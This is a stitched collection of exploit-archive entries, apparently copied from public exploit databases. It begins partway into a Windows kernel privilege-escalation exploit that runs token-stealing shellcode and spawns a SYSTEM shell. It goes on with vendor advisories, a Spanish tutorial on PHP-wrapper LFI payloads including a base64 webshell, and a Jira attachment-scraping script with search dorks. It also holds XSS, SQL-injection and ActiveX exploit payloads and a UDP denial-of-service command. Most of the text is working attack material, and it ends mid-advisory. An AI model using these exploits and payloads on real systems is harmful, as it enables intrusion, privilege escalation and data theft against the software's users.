NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
A user with limited privileges could gain access to certain
functionality that is available only to administrative users. For
example, users with Guest privileges can see the subjects of the
tickets, stats and other information related to tickets.
Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
Timeline
======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
Title : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9598
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt
Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421
Release Date:
=============
2015-01-26
Vulnerability Laboratory ID (VL-ID):
====================================
1421
Common Vulnerability Scoring System:
====================================
8.9
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.
Vulnerability Disclosure Timeline:
==================================
2015-01-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The sql vulnerability allows an attacker to inject sql commands to compromise the application & database management system.
The sql injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers
are able to inject own sql commands by manipulation of the vulnerable newsid value in the `news_view.php` file. A successful attack
requires to manipulate a GET method request with vulnerable `newsid` value to inject own sql commands. The injection is a classic
order by sql injection that allows to compromise the web-application and connected database management system. The request method to
inject own sql commands is GET and the vulnerability is located on the application-side of the service.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] News
Vulnerable File(s):
[+] news_view.php
Vulnerable Parameter(s):
[+] newsid
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Dork(s):
allinurl:news_view.php?newsid=
title:Powered By Powered by Mangallam
PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--
Reference(s):
http://localhost:8080/news_view.php
Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by usage of a prepared statement next to the newsid GET method request.
Restrict and filter the newsid value and disallow input of special chars. Prevent disaplaying of php errors by usage of the (0)error (php) function.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.
Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
En el caso de que tratemos con archivos PHP, existe un concepto que son los llamados PHP Wrappers. Un wrapper es una especie de envoltura que le dice al Stream (secuencia, petición, entrada/salida de datos) como actuar.
Esta característica de PHP es muy útil en ataques como el LFI y el XXE, gracias a esto, podemos obtener alguna que otra ventaja que de otra forma no tendríamos.
El concepto de wrapper quedará más claro cuando lo veamos ahora.
Índice:
- php://filter
- zip://
- data://
- php://input
- expect://
- Referencias
php://filter
El Wrapper filter nos permite encodear el archivo que le especifiquemos, esto es muy útil, ya que nos permite poder leer archivos PHP que en otro caso, el navegador simplemente interpretaría directamente.
Por ejemplo, tenemos el siguiente archivo:
Como vemos, tiene una contraseña en un comentario. Pero si nosotros accedemos al archivo desde la web:
Solo vemos la salida del código interpretado 😥. Sin embargo, usando el wrapper filter, seremos capaces de leer el archivo PHP al completo.
Para probar el wrapper, he creado un LFI en un archivo index.php. Por lo que, en este LFI, el payload que introduciremos para hacer uso del wrapper y leer el archivo secret.php, será el siguiente:
- php://filter/convert.base64-encode/resource=<archivo>
De esta forma, estamos leyendo el archivo secret.php pero en base64, por lo que si decodeamos esta salida:
Obtenemos el archivo al completo. Un detalle curioso sobre los wrappers es que podemos concatenar varios a través del uso de un pipe | o un slash /. Ejemplo:
Y obtenemos exactamente el mismo resultado.
Además de poder encodear en base64, podemos aplicar ROT13 con la siguiente cadena:
- php://filter/read=string.rot13/resource=<archivo>
Aunque este en concreto no sirve para leer archivos PHP:
Pero si aplica para otro tipo de archivos:
En conclusión, referente a este wrapper, tenemos los dos siguientes payloads:
- php://filter/convert.base64-encode/resource=<archivo>
- php://filter/read=string.rot13/resource=<archivo>
zip://
El wrapper zip nos permite ejecutar un php que hayamos metido dentro de un archivo zip. Incluso no hace falta que el archivo zip tenga como extensión zip, sino que puede tener cualquiera.
Este wrapper no está instalado por defecto, pero se puede instalar con el siguiente comando:
- sudo apt install phpX.Y-zip
Donde X e Y, es la versión PHP que tengamos instalada o a la que queramos instalarle esta característica.
Ejemplo de ejecución de webshell a través de este wrapper:
Payload:
- zip://<archivo zip>%23<archivo php>
En <archivo zip>, si no se encontrase en el directorio actual, se le especificaría el directorio donde se encontrase el archivo y listo.
Nota: en caso de que el archivo PHP fuese una webshell o esperase algún parámetro, se le agregaría con un ampersand como vemos en la siguiente imagen.
E incluso cambiando la extensión del zip, seguirá funcionando:
data://
El wrapper data nos permite incluir datos externos, incluido código PHP. Este wrapper solo funciona si la opción allow_url_include está activada en la configuración de PHP (la opción equivalente a un Remote File Inclusion).
Ejecutar código PHP con este wrapper es bastante sencillo, podemos hacerlo de dos formas:
- En texto plano
- En base 64
En texto plano, simplemente tendríamos que usar el siguiente payload:
- data:text/plain,<código PHP>
Ejemplo:
De cara a hacerlo usando base64, simplemente tendríamos que encodear el código PHP:
Y colocarlo en el wrapper tal que:
- data://text/plain;base64,<código PHP en base64>
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
De esta forma, como estamos definiendo un parámetro para ejecutar comandos, el payload para por ejemplo ejecutar el comando id sería:
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id
Ejemplo:
php://input
Este wrapper es parecido al de arriba (data). Se puede usar para incluir código PHP. Su requisito al igual que el wrapper data es que la opción allow_url_include de la configuración de PHP debe de estar habilitada.
Con esto hecho, se podría ejecutar comandos mandando el código PHP en los datos de una petición POST. Ejemplo:
- curl -s -X POST -d ‘<código PHP>’ ‘http://example.com/index.php?file=php://input’
En este caso, la salida del comando la podemos ver en la respuesta.
expect://
El wrapper expect no está instalado por defecto, pero en el caso de que lo esté, permite ejecutar directamente comandos de la siguiente forma:
- expect://<comando>
Esto ocurre porque este wrapper da acceso a una PTY (pseudo-teletype), que en UNIX básicamente se refiere a una terminal. Da acceso tanto al STDIN, STDOUT como STDERR.
Conclusión PHP Wrappers
Como hemos podido ver, esta característica de PHP es muy útil en muchas ocasiones, ya que nos puede ayudar conseguir acciones que de una u otra forma no podríamos. Es bastante útil hacer uso de ellas cuando estamos ante vulnerabilidades como el Local File Inclusion (LFI) o el XML External Entity (XXE), o realmente en cualquier caso donde veamos que tenemos la capacidad de usarlas.
Referencias
- What do pty and tty mean?
- expect://
- File Inclusion / Directory Traversal – HackTheBox Academy
source: https://www.securityfocus.com/bid/48484/info
Atlassian JIRA is prone to a security bypass vulnerability.
An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application.
<?php
/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google otherwise
you will get a lot of 404*/
echo "\n#########################################################
###################
# \n#Attachment downloader by Ignacio Garrido\n#";
if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/
1 12310371#
############################################################################\n";die;}
else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n";
#\n############################################################################\n";}
$url2 = $argv[1];
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}
if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}
$numero = $argv[2];
for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");
if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);
echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);
}
}
echo "\n#All attachment downloaded correctly!\n";
die;
?>
source: https://www.securityfocus.com/bid/48483/info
CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub
</script>
</html>
source: https://www.securityfocus.com/bid/48482/info
FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FlatPress 0.1010.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?x=entry:entry110603-123922;comments:1" method="post">
<input type="hidden" name="name" value='"><script>alert(1);</script>'>
<input type="hidden" name="email" value='"><script>alert(2);</script>'>
<input type="hidden" name="url" value='"><script>alert(3);</script>'>
<input name="send" value="EXPLOIT" type="submit">
</form>
source: https://www.securityfocus.com/bid/48471/info
Joomla! CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Joomla! CMS versions 1.6.3 and prior are vulnerable.
http://www.example.com/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";><script>alert(/XSS/)</script>
http://www.example.com/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
http://www.example.com/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
http://www.example.com/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request
source: https://www.securityfocus.com/bid/48476/info
RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.
Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed.
RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
#######################################################################
Luigi Auriemma
Application: NVIDIA RealityServer
http://www.realityserver.com/products/realityserver.html
http://www.nvidia.com/object/realityserver.html
Versions: <= 3.1.1 build 144525.5057
Platforms: Windows and Linux
Bug: NULL pointer
Exploitation: remote, versus server
Date: 27 Jun 2011 (found and reported on my forum 04 Dec 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"The RealityServer� platform is a powerful combination of NVIDIA�
Tesla� GPUs and 3D web services software that delivers interactive,
photorealistic applications over the web, enabling product designers,
architects and consumers to easily visualize 3D scenes with remarkable
realism."
#######################################################################
======
2) Bug
======
If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
NULL pointer dereference.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
udpsz -C 03 -b 0xff -T SERVER 1935 0xc02
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
source: https://www.securityfocus.com/bid/48469/info
The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pretty Link Lite 1.4.56 is vulnerable; prior versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
select @@version
http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
select @@version
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
select @@version
source: https://www.securityfocus.com/bid/48466/info
MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.
There is an example for illustrating the attack against the vulnerability:
----------------------------------------------------------------------
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Connection.Open();
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
Cmd.Fill(dt);
Cmd.SelectCommand.Connection.Close();
----------------------------------------------------------------------
Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
----------------------------------------------------------------------
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"
----------------------------------------------------------------------
Then, the final sql query statement executed by Mysql is as following:
----------------------------------------------------------------------
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
----------------------------------------------------------------------
Of course, we should use two parameters to launch a cross-parameter SQL injection attack.
================================================================================
[REWTERZ-20140102] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Enumeration Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140102
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-enumeration-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: User Name Enumeration
Impact: An unauthenticated and authenticated user can enumerate users
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
===================
An unauthenticated and authenticated user can enumerate all the users
and domains on the system by sending a simple request to URL.
Proof-of-Concept Authenticated User
============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http:// 127.0.0.1:8080/servlet/AJaxServlet?action=checkUser&search=guest
Response if User is valid:
{ USER_PRESENT: 'true', IN_SITE: 'true' }
Response if User is invalid:
{ USER_PRESENT: 'false', ADD_REQUESTER: 'false' }
Proof-of-Concept Unauthenticated User
==============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http://127.0.0.1:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=100101
If the user in the Search Parameter is found the response will contain
the domain name in which that particular user exists.
Timeline
=======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor
About Rewterz
============
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
================================================================================
[REWTERZ-20140101] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk SQL Injection Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: High
Advisory ID: REWTERZ-20140101
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-sql-injection-vulnerability
================================================================================
Product Introduction
================
ServiceDesk Plus is a help desk software with integrated asset and
